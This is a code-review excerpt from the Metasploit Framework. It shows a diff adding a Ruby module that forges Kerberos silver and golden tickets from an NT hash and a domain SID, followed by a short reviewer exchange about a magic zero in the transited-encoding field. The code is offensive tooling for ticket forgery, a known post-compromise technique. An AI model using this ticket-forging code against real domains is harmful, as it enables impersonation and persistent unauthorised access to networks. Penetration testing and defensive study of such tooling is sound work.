lib/msf/core/exploit/remote/kerberos/client/ticket.rb

```diff
@@ -0,0 +1,150 @@
+# -*- coding: binary -*-
+
+require 'date'
+
+module Msf
+  class Exploit
+    class Remote
+      module Kerberos
+        module Client
+          module Ticket
+            SECS_IN_DAY = 60 * 60 * 24
+
+            def create_silver_ticket(nt_hash:, domain_sid:, domain:, spn:, username:)
+              sname = spn.split('/', 2)
+              flags = Rex::Proto::Kerberos::Model::TicketFlags.from_flags(silver_ticket_flags)
+
+              generate_ccache(domain, domain_sid, flags, nt_hash, sname, username)
+            end
+
+            def create_golden_ticket(nt_hash:, domain_sid:, domain:, username:)
+              sname = ['krbtgt', domain.upcase]
+              flags = Rex::Proto::Kerberos::Model::TicketFlags.from_flags(golden_ticket_flags)
+
+              generate_ccache(domain, domain_sid, flags, nt_hash, sname, username)
+            end
+
+            def create_ticket(enc_key:, secure_random_key:, domain:, principal:, opts:)
+              ticket_enc_part = create_enc_ticket_part(key: secure_random_key, domain: domain, opts: opts)
+              enc_part = encrypt_ticket_enc_part(ticket_enc_part: ticket_enc_part, key: enc_key)
+              Rex::Proto::Kerberos::Model::Ticket.new(
+                tkt_vno: Rex::Proto::Kerberos::Model::VERSION,
+                realm: domain.upcase,
+                sname: principal,
+                enc_part: enc_part
+              )
+            end
+
+            def create_enc_ticket_part(key:, domain:, opts: {})
+              ticket_enc_part = Rex::Proto::Kerberos::Model::TicketEncPart.new
+
+              ticket_enc_part.key = Rex::Proto::Kerberos::Model::EncryptionKey.new(
+                type: Rex::Proto::Kerberos::Crypto::Encryption::RC4_HMAC, value: key
+              )
+              ticket_enc_part.flags = opts[:flags]
+              ticket_enc_part.crealm = domain.upcase
+              ticket_enc_part.cname = opts[:client]
+              ticket_enc_part.transited = Rex::Proto::Kerberos::Model::TransitedEncoding.new(tr_type: 0, contents: '')
```

Comment:
Can we swap this out to use a constant instead of a magic 0 👀

Reply:
I...don't think we can
https://datatracker.ietf.org/doc/html/rfc4120#section-7.5.5